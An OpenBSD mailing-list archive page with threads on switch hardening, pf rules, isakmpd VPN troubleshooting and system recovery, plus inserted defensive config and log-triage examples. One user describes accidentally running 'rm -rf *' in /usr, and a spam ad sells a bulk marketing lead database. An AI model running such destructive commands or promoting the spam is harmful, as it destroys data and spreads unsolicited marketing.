Re: ssh brute force attacks

2005-11-13 Thread Petr Ruzicka
Well,
for cizcoeee switches, configuring "DHCP snooping" and "Dynamic ARP
inspection" could help (in order to armor the switch against ARP poisoning
or DHCP impersonation, i.e. to be better protected against sniffing on the
switch).

P.
On 11/14/05, bofh <[EMAIL PROTECTED]> wrote:
> On 11/13/05, Joachim Schipper <[EMAIL PROTECTED]> wrote:
> >
> > This is an attack against TCP, not SSH. TCP is not encrypted (usually -
> > IPSec or somesuch, with the proper settings, could make this impossible)
> > - all that's required is some sequence numbers.
> >
> > And yes, a really good switch configured by someone who really knows
> > what he's doing will protect you from this. Fail either, and there's
>
>
>
> Hi,
> what kind of config is needed? Just curious, thanx.
>
> -Tai
>
>


--
"Security is decided by quality" -- Theo de Raadt
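The two features Petr names, shown as an added IOS configuration sketch; it is not Petr's configuration and not taken from a vendor document. VLAN 10, Gi0/1-23 as access ports and Gi0/24 as the uplink toward the router and DHCP server are assumptions. Port security is included as well because overloading the switch's MAC table comes up elsewhere in this thread.

```cisco
! Added example, not Petr's configuration. VLAN 10, ports Gi0/1-23 as
! access ports and Gi0/24 as the uplink toward the DHCP server are assumptions.
!
! DHCP snooping: only the trusted uplink may carry server->client DHCP
! messages (OFFER/ACK), and every lease seen builds an IP/MAC/port binding.
ip dhcp snooping
ip dhcp snooping vlan 10
!
! Dynamic ARP inspection checks ARP on untrusted ports against those
! bindings, so a forged "I am the gateway" reply from a client port is dropped.
ip arp inspection vlan 10
ip arp inspection validate src-mac dst-mac ip
!
interface GigabitEthernet0/24
 description uplink to router and DHCP server
 switchport mode trunk
 ip dhcp snooping trust
 ip arp inspection trust
!
interface range GigabitEthernet0/1 - 23
 switchport mode access
 switchport access vlan 10
 ! untrusted by default: DHCP server messages and unverified ARP arriving
 ! here are dropped; the rate limits keep a flood from tying up the CPU
 ip dhcp snooping limit rate 15
 ip arp inspection limit rate 15
 ! cap the MACs learned per port so the CAM table cannot be overrun
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation restrict
!
end
```

Verify with `show ip dhcp snooping binding`, `show ip arp inspection vlan 10` and `show ip arp inspection statistics vlan 10`. Two caveats: snooping has to be enabled both globally and per VLAN, or nothing is inspected; and hosts with static addresses have no binding, so their ARP is dropped unless an `arp access-list` is applied to the VLAN with `ip arp inspection filter`.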



Re: pf keep state on 3.8

2005-11-13 Thread jimmy
Quoting Jim Razmus <[EMAIL PROTECTED]>:

> * Jimmy Scott <[EMAIL PROTECTED]> [051113 12:35]:
> > Hi misc@,
> >
> > I finally had some time to rearrange my network, and split it into 3
> > parts: LAN, DMZ, WAN.
> >
> > Basically, the LAN (172.20) may not access the DMZ (172.16), but host
> > 172.20.1.10 can. The DMZ may not access the LAN, and both can go to the
> > WAN.
> >
> > But for some reason, when I create state from 172.20.1.10 to 172.16.x.x;
> > the packet coming back gets blocked which should not happen because the
> > state would be checked first and the state really is created?!
> >
> > I tried setting 'set state-policy floating' explicitly, but no advance.
> > Someone who knows what the problem is here? I had a ruleset with a bunch
> > of 'quick' rules before instead of this, but had the same problem.
> >
> > [diagnostics snipped]
> >
>
> I think you might have the concept of "in" and "out" rules confused.
> Visualize yourself sitting in the computer between the three interfaces.
> From that perspective, "in" rules mean a packet coming from a remote
> host to you through one of those interfaces.  Conversely "out" rules
> mean a packet leaving from the local machine to some remote host.
>
> Give something like this a whirl for starters.  Caution, I have not
> tested these!  You also likely need to allow packets from the Internet
> into your DMZ.
>
> # pf.conf
> [proposed firewall rules snipped]
>
>
> HTH,
> Jim
>
>

Aah, I see what I did wrong. Since I used 'pass all on sis2' in the past,
I never realized that state creation on an 'in' will only match an 'out'
for traffic in the other direction, right? So for traffic from sis2 to sis1
I will need to create states on the 'in' of sis2 and states on the 'out' of
sis1, if I got it right.

Also thanks for your example, I will take a look at it later when I'm back
home to figure things out.

Kind regards,
Jimmy Scott




This message has been sent through ihosting.be
To report spamming or other unaccepted behavior
by a iHosting customer, please send a message 
to [EMAIL PROTECTED]
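The arrangement Jim describes and Jimmy arrives at, written out as an added example: it is neither Jim's snipped proposal nor Jimmy's posted rules, and like Jim's it is untested. Interface roles follow the pflog excerpt in the thread (sis2 faces the LAN, sis1 the DMZ); sis0 as the WAN interface is an assumption. The point is the one Jimmy draws: on 3.8 a state created by a 'pass in ... keep state' rule matches that connection's packets coming in and its replies going out, but the same connection leaving on sis1 and its reply arriving in on sis1 are the opposite pairing and need their own state from a 'pass out ... keep state' rule. Without one, the reply falls through to the default 'block in' (rule 21 in the pflog) exactly as Jimmy saw.

```pf
# Added example for the LAN/DMZ/WAN split discussed above, not the
# ruleset Jim posted. sis0 as the WAN interface is an assumption.
ext_if  = "sis0"
dmz_if  = "sis1"
lan_if  = "sis2"
lan_net = "172.20.0.0/16"
dmz_net = "172.16.0.0/16"
admin   = "172.20.1.10"

set state-policy floating
scrub in all no-df fragment reassemble

# Default deny for packets arriving on any interface. pf checks states
# before rules, so each 'keep state' below carries the rest of that
# connection without further rules.
block drop in log all
pass quick on lo0 all

# LAN (sis2): anywhere except the DMZ, plus the one admin host into the DMZ.
pass in on $lan_if inet proto { tcp udp icmp } from $lan_net to ! $dmz_net keep state
pass in on $lan_if inet proto { tcp udp icmp } from $admin to $dmz_net keep state

# DMZ (sis1): anywhere except the LAN.
pass in on $dmz_if inet proto { tcp udp icmp } from $dmz_net to ! $lan_net keep state

# WAN (sis0): only the DMZ services you publish. ssh to 172.16.0.5 is the
# example here because it is the service in the pflog excerpt.
pass in on $ext_if inet proto tcp from any to 172.16.0.5 port ssh keep state

# The missing half: a connection leaving the box on another interface
# needs its own state there, or its reply is dropped by 'block in' on
# that interface.
pass out inet proto { tcp udp icmp } all keep state
```

Check the syntax with `pfctl -nf /etc/pf.conf` before loading. After an admin-host connection to the DMZ, `pfctl -s state` should show two entries for it (one from the sis2 in rule, one from the out rule) rather than the single CLOSED:SYN_SENT entry in Jimmy's excerpt.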




Re: Slow DVD Speed

2005-11-13 Thread steven mestdagh
On Wed, Nov 09, 2005 at 10:40:16PM -0800, Dan Smythe wrote:
> I am having slow DVD burning speeds. I am running
> OpenBSD 3.6 Release.

try 3.8 instead!

> I'm getting speeds of about 0.2x. I will attach my
> dmesg file. What should I do to fix this problem?
> 
> [demime 1.01d removed an attachment of type application/octet-stream which 
> had a name of dmesg.boot]

if your problem persists with 3.8, try again by posting your dmesg and any
other relevant info in-line (not as attachment).

-- 
steven

Disclaimer: http://www.kuleuven.be/cwis/email_disclaimer.htm



Re: src.tar.gz vs sys.tar.gz

2005-11-13 Thread Greg Thomas
On 11/13/05, Nick Holland <[EMAIL PROTECTED]> wrote:
>
> Greg Thomas wrote:
> > Ok, it's been awhile since I've seen a message explaining what's in
> > src.tar.gz and sys.tar.gz. I know Nick and a few people have sent
> messages
> > to the list explaining what is in each but I haven't found the messages.
> >
> > From looking at the two is src.tar.gz the source for the whole release?
> And
> > sys.tar.gz just the kernel?
>
> erf. Seems harder to find than it should be, perhaps. However, using
> the search box in the front page does answer the question, so I don't
> feel TOO guilty... :)



Oops, I've never used it.

> http://www.openbsd.org/anoncvs.html
> http://www.openbsd.org/ftp.html
> (should be in faq5.html, but isn't currently)
>
> both describe 'em:
> sys.tar.gz is the kernel source files
> src.tar.gz is the REST of the userland files
>
> if you want to build the whole thing, you need BOTH.
>
> They are broken up on the FTP servers as some people with limited
> bandwidth would only need to customize the kernel, and wouldn't care
> about the userland. On the CDROM (paranoia is setting in, I don't have
> my CD handy, so maybe I'm wrong), there is only one, containing
> everything, since downloading isn't an issue.



Ah, that's what was throwing me off. I grabbed src.tar.gz from CD and saw
everything in /usr/src/sys so was just a little confused.

Installed 3.8 on this IBM T20 I found at work and I'm digging it more than
my Dell Latitude D600 even though it's 3 years older. apm works, which is
more than I can say for ACPI on the Dell, and the IBM keyboard feels
waay better, plus the track stick/pencil eraser/whatever it's
called on the IBM doesn't get stuck scrolling off the side of the screen
like the Dell's does.

Thanks!

Greg



American Business Database Available

2005-11-13 Thread Info
Canada Books
26 Bellevue
Lac Guindon
Qc, Canada
J0R 1B0

Press Release

The "American Business Database" is now available. This 
database contains more than 25 million business leads.

Our fully importable database is perfect for entrepreneurs and 
marketing professionals to quickly gain access to a wealth of 
information to start a direct marketing campaign.

The American Business Database is excellent for direct mail 
marketing campaigns, fax broadcasting, finding new suppliers, 
distributors or manufacturers for your products/services. It is 
also a great source of leads for sales/telemarketing campaigns.

You can freely import the text file to your favorite software such 
as Avery Label, Winfax, Filemaker, Act, Goldmine, MS office or 
any other database software and spreadsheet.

What it contains:

-Company name
-Full mailing address
-Telephone number
-Fax number (When available)
-Industry category

The database is sold for $199.95
To place your order call: 450-224-9275


If you do not wish to receive communication from us in the future 
please write "nop" in the subject line to: [EMAIL PROTECTED]



Re: nsswitch

2005-11-13 Thread Tony Lambiris
probably not -- but we use ldap here at work, and the auth_ldap in the 
ports tree works great.


Aiko Barz wrote:

I googled, but I couldn't figure out the current status.

My problem:
I tried to move my mailservers from Linux to OpenBSD. It's a qmail-ldap
system with its users stored in OpenLDAP. Each of my users has its own
UID. There is only one troublemaker: maildrop. It depends on getpwuid
and getpwnam. But OpenBSD doesn't know anything about my LDAP-users.

Solution:
There are some solutions. maildrop could lookup the account data
directly before invoking getpwuid and getpwnam. (I prefer not to write
this patch. It ends up in courier-authlib and so on.) The dirty hack is
to use the environment variables which are provided by qmail-local
($USER, $HOME). (This is safe for me because chuid gets called before
executing maildrop. I'm not happy with this solution.)

Another solution would be something like nsswitch. Are there any plans
to implement something like this?

Bye,
Aiko




Re: quagga woes

2005-11-13 Thread Bob DeBolt
I use it fine on 3.8, fresh cvs update for everything stable.

Bob D



Re: src.tar.gz vs sys.tar.gz

2005-11-13 Thread Nick Holland
Greg Thomas wrote:
> Ok, it's been awhile since I've seen a message explaining what's in
> src.tar.gz and sys.tar.gz. I know Nick and a few people have sent messages
> to the list explaining what is in each but I haven't found the messages.
> 
> From looking at the two is src.tar.gz the source for the whole release? And
> sys.tar.gz just the kernel?

erf.  Seems harder to find than it should be, perhaps.  However, using
the search box in the front page does answer the question, so I don't
feel TOO guilty... :)

  http://www.openbsd.org/anoncvs.html
  http://www.openbsd.org/ftp.html
(should be in faq5.html, but isn't currently)

both describe 'em:
   sys.tar.gz is the kernel source files
   src.tar.gz is the REST of the userland files

if you want to build the whole thing, you need BOTH.

They are broken up on the FTP servers as some people with limited
bandwidth would only need to customize the kernel, and wouldn't care
about the userland.  On the CDROM (paranoia is setting in, I don't have
my CD handy, so maybe I'm wrong), there is only one, containing
everything, since downloading isn't an issue.

Nick.



Problem with ISAKMPD

2005-11-13 Thread James Mackinnon
Hey everyone

I am hoping I am posting this to the correct list

I am running an AMD 2200+ w/ 512mb of ram and all intel pro cards in my main
location.

I have 14 other locations connecting back to this 1 location and each location
creates 3 tunnels to this system as I have
3 internal network segments I want available via VPN

Platforms are:

Main system: OpenBSD 3.7 Stable
Remote locations: OpenBSD 3.5 and some OpenBSD 3.7

at first, all locations come up fine, but then in approx 1 hour, 3 units stop
communicating to the main firewall.

They all have the same config (minor changes based on location and assigned
ips of course).

I was planning to finally get rid of my main Checkpoint box and complete my
migration to BSD, but I had to revert due to the lack of time I had left to go
back in case of an issue.


My Main location is on Fiber
All branches on DSL (pretty much same provider)

My main location has approx 50VPN Connection entries in it.
My Branches connect to 3 VPN's.

Example branch isakmpd.conf file

[Phase 1]
12.12.12.12= peer-loc1
13.13.13.13= peer-loc2
14.14.14.14= peer-loc3


[Phase 2]
Connections=LOC1-SEG1, LOC1-SEG2, LOC1-SEG3, LOC2-SEG1, LOC3-SEG1

[peer-loc1]
Phase=  1
Transport=  udp
Address=12.12.12.12
Configuration=  Default-main-mode
Authentication= MYSUPERPASS

[peer-loc2]
Phase=  1
Transport=  udp
Address=13.13.13.13
Configuration=  Default-main-mode
Authentication= MYSUPERPASS

[peer-loc3]
Phase=  1
Transport=  udp
Address=14.14.14.14
Configuration=  Default-main-mode
Authentication= MYSUPERPASS

[LOC1-SEG1]
Phase=  2
ISAKMP-peer=peer-loc1
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc1-seg1-Network

[LOC1-SEG2]
Phase=  2
ISAKMP-peer=peer-loc1
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc1-seg2-Network

[LOC1-SEG3]
Phase=  2
ISAKMP-peer=peer-loc1
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc1-seg3-Network

[LOC2-SEG1]
Phase=  2
ISAKMP-peer=peer-loc2
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc2-seg1-Network

[LOC3-SEG1]
Phase=  2
ISAKMP-peer=peer-loc3
configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc3-seg1-Network

[loc1-seg1-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.22.0
Netmask=255.255.255.0

[loc1-seg2-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.23.0
Netmask=255.255.255.0

[loc1-seg3-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.24.0
Netmask=255.255.255.0

[loc2-seg1-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.21.0
Netmask=255.255.255.0

[loc3-seg1-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.20.0
Netmask=255.255.255.0


[Loc-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.25.0
Netmask=255.255.255.0

[Default-main-mode]
DOI=IPSEC
EXCHANGE_TYPE=  ID_PROT
Transforms= 3DES-SHA

[Default-quick-mode]
DOI=IPSEC
EXCHANGE_TYPE=  QUICK_MODE
Suites= QM-ESP-3DES-SHA-SUITE


My isakmpd.policy file

Keynote-version: 2
Authorizer: "POLICY"
Conditions: app_domain == "IPsec policy" &&
esp_present == "yes" &&
esp_enc_alg != "null" -> "true";




I have run isakmpd -L, which I am still reviewing, but most errors are below

Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: giving up on message 0x3c066800, exchange fw01
Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: either this message did not reach the other peer
Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: or the responsemessage did not reach us back

Nov 13 05:41:46 fw2 isakmpd[16014]: dropped message from fw01 port 500 due to notification type PAYLOAD_MALFORMED
Nov 13 05:41:46 fw2 isakmpd[16014]: message_parse_payloads: reserved field non-zero: ca
Nov 13 05:41:46 fw2 isakmpd[16014]: dropped message from fw01 port 500 due to notification type PAYLOAD_MALFORMED
Nov 13 21:09:52 fw2 isakmpd[3312]: message_recv: invalid cookie(s) 8710be0bf45687ff 482bbdaf5287d3db
Nov 13 21:09:52 fw2 isakmpd[3312]: dropped message from fw01 port 57834 due to notification type INVALID_COOKIE
Nov 13 21:11:41 fw2 isakmpd[12205]: message_recv: invalid cookie(s) 91bd63a6716685f7 439a07ad7e83a2e6
Nov 13 21:11:41 fw2 isakmpd[12205]: dropped message from fw01 port 500 due to notification type INVALID_COOKIE



I am lost at this point because the layout is the same, for all firewalls
including the PF config as I built a generic config and deploy to them all

oh, also, my remote firewalls are running approx 200 states and my main one is
running approx 6000-8000 states, and this is during low business times; the high
business count is hard to determine at this point but I am guessing approx
2-4

Anyhow, any suggestions here would be great as it stands right now, I am back
on checkpoint and I am 
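A triage pass over the isakmpd log lines James posted, as an added example; it is not from the thread and not part of isakmpd. It groups the dropped-message notifications per peer, counts the retransmission give-ups per exchange, tracks isakmpd PID changes (each one is a daemon restart) and flags peers whose messages arrive from a UDP port other than 500/4500. The log sample inside is the thread's own excerpt with the mail wrapping undone.

```python
"""Summarise isakmpd(8) syslog output: which peer fails, how, and whether
the daemon restarted in between.  Added example, not part of the thread."""
import re
from collections import Counter

# The thread's log excerpt with the mail wrapping undone (values as posted).
SAMPLE_LOG = """\
Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: giving up on message 0x3c066800, exchange fw01
Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: either this message did not reach the other peer
Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: or the responsemessage did not reach us back
Nov 13 05:41:46 fw2 isakmpd[16014]: dropped message from fw01 port 500 due to notification type PAYLOAD_MALFORMED
Nov 13 05:41:46 fw2 isakmpd[16014]: message_parse_payloads: reserved field non-zero: ca
Nov 13 05:41:46 fw2 isakmpd[16014]: dropped message from fw01 port 500 due to notification type PAYLOAD_MALFORMED
Nov 13 21:09:52 fw2 isakmpd[3312]: message_recv: invalid cookie(s) 8710be0bf45687ff 482bbdaf5287d3db
Nov 13 21:09:52 fw2 isakmpd[3312]: dropped message from fw01 port 57834 due to notification type INVALID_COOKIE
Nov 13 21:11:41 fw2 isakmpd[12205]: message_recv: invalid cookie(s) 91bd63a6716685f7 439a07ad7e83a2e6
Nov 13 21:11:41 fw2 isakmpd[12205]: dropped message from fw01 port 500 due to notification type INVALID_COOKIE
"""

LINE_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) '
    r'isakmpd\[(?P<pid>\d+)\]: (?P<msg>.*)$')
DROP_RE = re.compile(
    r'dropped message from (?P<peer>\S+) port (?P<port>\d+) '
    r'due to notification type (?P<ntype>[A-Z_]+)')
GIVEUP_RE = re.compile(
    r'transport_send_messages: giving up on message \S+, exchange (?P<exch>\S+)')
IKE_PORTS = {500, 4500}   # UDP 500 is IKE; 4500 only when NAT traversal is in use


def triage(log_text):
    """Return a dict with
      drops:     Counter of (peer, notification type) -> occurrences
      gave_up:   Counter of exchange name -> retransmission give-ups
      pids:      isakmpd PIDs in order of first appearance
      restarts:  number of PID changes (each one is a daemon restart)
      odd_ports: set of (peer, port) for peers not talking from 500/4500
    """
    drops, gave_up = Counter(), Counter()
    pids, odd_ports = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not an isakmpd line, skip it
        pid, msg = m.group('pid'), m.group('msg')
        if pid not in pids:
            pids.append(pid)
        d = DROP_RE.search(msg)
        if d:
            drops[(d.group('peer'), d.group('ntype'))] += 1
            port = int(d.group('port'))
            if port not in IKE_PORTS:
                odd_ports.add((d.group('peer'), port))
            continue
        g = GIVEUP_RE.search(msg)
        if g:
            gave_up[g.group('exch')] += 1
    return {'drops': drops, 'gave_up': gave_up, 'pids': pids,
            'restarts': max(len(pids) - 1, 0), 'odd_ports': odd_ports}


def report(summary):
    """Render the summary as lines an operator can scan."""
    out = []
    for (peer, ntype), n in sorted(summary['drops'].items()):
        out.append(f'{peer}: {n} message(s) dropped with {ntype}')
    for exch, n in sorted(summary['gave_up'].items()):
        out.append(f'{exch}: gave up on {n} exchange(s), no reply to retransmissions')
    if summary['restarts']:
        out.append(f"isakmpd restarted {summary['restarts']} time(s): "
                   f"pids {' -> '.join(summary['pids'])}")
        if any(t == 'INVALID_COOKIE' for _, t in summary['drops']):
            # cookies name the ISAKMP SA; a freshly started daemon knows none
            out.append('INVALID_COOKIE after a restart: the peer is still using an '
                       'ISAKMP SA this side no longer has; it must redo Phase 1')
    for peer, port in sorted(summary['odd_ports']):
        out.append(f'{peer} spoke from UDP port {port}, not 500: check for NAT '
                   f'or other port rewriting between the sites')
    return out


if __name__ == '__main__':
    print('\n'.join(report(triage(SAMPLE_LOG))))
```

Run against the real log with `triage(open('/var/log/daemon').read())`. On the excerpt it separates three different things: a peer that stopped answering retransmissions, malformed payloads, and cookie mismatches that line up with two PID changes, plus one message from port 57834 instead of 500, which is worth checking before suspecting the configuration that is identical on every branch.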

nsswitch

2005-11-13 Thread Aiko Barz
I googled, but I couldn't figure out the current status.

My problem:
I tried to move my mailservers from Linux to OpenBSD. It's a qmail-ldap
system with its users stored in OpenLDAP. Each of my users has its own
UID. There is only one troublemaker: maildrop. It depends on getpwuid
and getpwnam. But OpenBSD doesn't know anything about my LDAP-users.

Solution:
There are some solutions. maildrop could lookup the account data
directly before invoking getpwuid and getpwnam. (I prefer not to write
this patch. It ends up in courier-authlib and so on.) The dirty hack is
to use the environment variables which are provided by qmail-local
($USER, $HOME). (This is safe for me because chuid gets called before
executing maildrop. I'm not happy with this solution.)

Another solution would be something like nsswitch. Are there any plans
to implement something like this?

Bye,
Aiko
-- 
Aiko Barz <[EMAIL PROTECTED]>
Web: http://www.haeckser.de



Re: ssh brute force attacks

2005-11-13 Thread bofh
On 11/13/05, Joachim Schipper <[EMAIL PROTECTED]> wrote:
>
> This is an attack against TCP, not SSH. TCP is not encrypted (usually -
> IPSec or somesuch, with the proper settings, could make this impossible)
> - all that's required is some sequence numbers.
>
> And yes, a really good switch configured by someone who really knows
> what he's doing will protect you from this. Fail either, and there's



Hi,
what kind of config is needed? Just curious, thanx.

-Tai



Re: uh oh, accidently deleted /usr/bin

2005-11-13 Thread Nick Holland
b h wrote:
> Hi
> Okay, I feel really stupid, but that's beside the
> point.  I need to be able to recover this machine. 
> It's running current built from src as of November 7.
> 
> I was brilliantly removing my src directory with a rm
> -rf * to get a completely fresh tree, when I realized
> I was a directory too high, running that command from
> /usr  after immediately stopping it, I noticed the
> bin directory gone (and I figure there is some missing
> from the dest directory too -- this is all presuming
> that rm -rf goes alphabetically)...

dangerous assumption.  I'm not sure you are wrong, but I don't know that
you are right, either.  I'm thinking I've seen evidence that under some
conditions, it does not sort them.  But someone will probably tell me
I'm wrong. :)

> 
> what is my best bet here?  The system is still up and
> running.  I presume it is to get some of the install
> sets and unpack them -- I would rather *not* like to
> do a reinstall.  Which install sets do I need
> (presuming from the most recent snapshot, following
> instructions from 4.10 of FAQ).  I figure I need 
> 
> comp38.tgz
> base38.tgz
> misc38.tgz

basically, yes.
Depends on if /usr/local got hit at all.

> Maybe I don't need all three of these?

Why are you trying to do the absolute minimum?  There is NO point.

IF you installed from snapshot or tarballs you made and still have,
install ALL of them except for etc38.tgz.  Then you are probably done.

As you say you upgraded from source, you probably don't have the *.tgz
files that match your existing system, I'd just grab the -current
snapshot, and install that over your existing install, again, all file
sets other than etc38.tgz and xetc38.tgz, and the new kernels.  Done.

If you use any other file sets, you will end up with a "mixed" system --
it might work, it might blow up in your face, probably something between
the two.  Just do it right.

> Anything else
> or other gotchas I should look out for?  Can I safely
> reboot after untarring the above?  Then after that I
> presume I can safely build from a newly checked out
> src again (being more careful)?

Just install the snapshot.  Stop.
You don't need to build it from source.

You will probably need to boot from a bsd.rd kernel, as you probably
killed /usr/bin/gzip (and ftp, and ...), needed to unpack the tgz
files...just say "upgrade", pull down pub/OpenBSD/snapshots/,
from your favorite mirror, it will unpack what you need where you need
it, and not break what is currently there.

Actually, were I to guess, your bsd.rd is probably old, you didn't
rebuild that, did you?  So you probably need to get a -current bsd.rd on
the system to do a good upgrade.

boot off your bsd.rd, choose upgrade, wait until it sets up your network.
Drop to shell, make sure you have / mounted on /mnt (or wherever), and
ftp a new bsd.rd.  Now, reboot off that one, otherwise you will have a
failure when you try to rebuild /dev.  Probably not a fatal error, you
could probably reboot after the upgrade successfully and "MAKEDEV all".

See?  Would have been easier to upgrade via snap...you would have a more
-current bsd.rd. :)

Nick.



src.tar.gz vs sys.tar.gz

2005-11-13 Thread Greg Thomas
Ok, it's been awhile since I've seen a message explaining what's in
src.tar.gz and sys.tar.gz. I know Nick and a few people have sent messages
to the list explaining what is in each but I haven't found the messages.

From looking at the two is src.tar.gz the source for the whole release? And
sys.tar.gz just the kernel?

Thanks,
Greg



Re: uh oh, accidently deleted /usr/bin

2005-11-13 Thread David Hill
On Sun, Nov 13, 2005 at 02:16:07PM -0800, b h wrote:
> Hi
> Okay, I feel really stupid, but that's beside the
> point.  I need to be able to recover this machine. 
> It's running current built from src as of November 7.
> 
> I was brilliantly removing my src directory with a rm
> -rf * to get a completely fresh tree, when I realized
> I was a directory too high, running that command from
> /usr  after immediately stopping it, I noticed the
> bin directory gone (and I figure there is some missing
> from the dest directory too -- this is all presuming
> that rm -rf goes alphabetically)...
> 
> what is my best bet here?  The system is still up and
> running.  I presume it is to get some of the install
> sets and unpack them -- I would rather *not* like to
> do a reinstall.  Which install sets do I need
> (presuming from the most recent snapshot, following
> instructions from 4.10 of FAQ).  I figure I need 
> 
> comp38.tgz
> base38.tgz
> misc38.tgz
> 
> Maybe I don't need all three of these?  Anything else
> or other gotchas I should look out for?  Can I safely
> reboot after untarring the above?  Then after that I
> presume I can safely build from a newly checked out
> src again (being more careful)?
> 
> much thanks
> b
> 
> 
>   
> __ 
> Start your day with Yahoo! - Make it your home page! 
> http://www.yahoo.com/r/hs
> 

You will also need the newer bsd kernel as well making sure you keep
the kernel and userland in sync.



uh oh, accidently deleted /usr/bin

2005-11-13 Thread b h
Hi
Okay, I feel really stupid, but that's beside the
point.  I need to be able to recover this machine. 
It's running current built from src as of November 7.

I was brilliantly removing my src directory with a rm
-rf * to get a completely fresh tree, when I realized
I was a directory too high, running that command from
/usr  after immediately stopping it, I noticed the
bin directory gone (and I figure there is some missing
from the dest directory too -- this is all presuming
that rm -rf goes alphabetically)...

what is my best bet here?  The system is still up and
running.  I presume it is to get some of the install
sets and unpack them -- I would rather *not* like to
do a reinstall.  Which install sets do I need
(presuming from the most recent snapshot, following
instructions from 4.10 of FAQ).  I figure I need 

comp38.tgz
base38.tgz
misc38.tgz

Maybe I don't need all three of these?  Anything else
or other gotchas I should look out for?  Can I safely
reboot after untarring the above?  Then after that I
presume I can safely build from a newly checked out
src again (being more careful)?

much thanks
b



__ 
Start your day with Yahoo! - Make it your home page! 
http://www.yahoo.com/r/hs



Re: SCSI config for HP SureStore tape drive

2005-11-13 Thread Steve Harding
For the archives - I borrowed a different HP drive, and it came up in 
the dmesg as it should have. Looks like my SureStore is junk.


Steve Harding wrote:

I recently installed a SCSI card and an external HP SureStore 24G tape 
drive, and am unable to access it. By reading lots of man pages, it 
appears that I need to configure /dev/rst0 so that it knows what is 
hooked to the SCSI port, but I have no clue how to do it. Worse, I 
have this feeling that it is something so fundamental that any 
knucklehead should be able to figure it out. I have googled, and read 
what I think are all of the applicable man pages, no luck.


When I attempt to write to the tape I get:

$ dump -0au /pub/etc36/
DUMP: Ignoring u flag for subdir dump
DUMP: Dumping sub files/directories from /pub
DUMP: Dumping file/directory /pub/etc36/
DUMP: Date of this level 0 dump: Thu Oct 13 19:37:27 2005
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/rwd0j (/pub) to /dev/rst0
DUMP: mapping (Pass I) [regular files]
DUMP: mapping (Pass II) [directories]
DUMP: estimated 5606 tape blocks.
DUMP: Cannot open output "/dev/rst0".
DUMP: Do you want to retry the open?: ("yes" or "no")

Dmesg  follows, any help would be appreciated.
Steve

OpenBSD 3.7 (GENERIC.MP) #50: Sun Mar 20 00:17:19 MST 2005
  [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
cpu0: AMD Athlon(tm) MP 2000+ ("AuthenticAMD" 686-class) 1.67 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR,SSE
real mem  = 1073258496 (1048104K)
avail mem = 972795904 (949996K)
using 4278 buffers containing 53764096 bytes (52504K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(f6) BIOS, date 03/05/02, BIOS32 rev. 0 @ 0xfb100
apm0 at bios0: Power Management spec V1.2
apm0: AC on, battery charge unknown
pcibios0 at bios0: rev 2.1 @ 0xf/0xdf94
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfdec0/208 (11 entries)
pcibios0: PCI Exclusive IRQs: 5 11
pcibios0: no compatible PCI ICU found
pcibios0: Warning, unable to fix up PCI interrupt routing
pcibios0: PCI bus #2 is the last bus
bios0: ROM list: 0xc/0xa800 0xcc000/0x2800 0xcf000/0x1800
mainbus0: Intel MP Specification (Version 1.4) (OEM0 PROD)
cpu0 at mainbus0: apid 0 (boot processor)
k7_powernow: couldn't map BIOS
cpu0: apic clock running at 266 MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: AMD Athlon(tm) MP 2000+ ("AuthenticAMD" 686-class) 1.67 GHz
cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV
mainbus0: bus 0 is type PCI
mainbus0: bus 1 is type PCI
mainbus0: bus 2 is type PCI
mainbus0: bus 3 is type ISA
ioapic0 at mainbus0: apid 2 pa 0xfec0, version 11, 24 pins
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "AMD 762 PCI" rev 0x11
ppb0 at pci0 dev 1 function 0 "AMD 762 PCI-PCI" rev 0x00
pci1 at ppb0 bus 1
vga1 at pci1 dev 5 function 0 "Nvidia Vanta" rev 0x15
wsdisplay0 at vga1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "AMD 768 ISA" rev 0x05
pciide0 at pci0 dev 7 function 1 "AMD 768 IDE" rev 0x04: DMA, channel 0 configured to compatibility, channel 1 configured to compatibility
wd0 at pciide0 channel 0 drive 0:
wd0: 16-sector PIO, LBA48, 38166MB, 78165360 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 5
pciide0: channel 1 disabled (no drives)
"AMD 768 Power Mgmt" rev 0x03 at pci0 dev 7 function 3 not configured
auich0 at pci0 dev 7 function 5 "AMD 768 AC97" rev 0x03: apic 2 int 17 (irq 11), AMD768 AC97
ac97: codec id 0x49434511 (ICEnsemble ICE1232)
ac97: codec features headphone, 18 bit DAC, 18 bit ADC, KS Waves 3D
audio0 at auich0
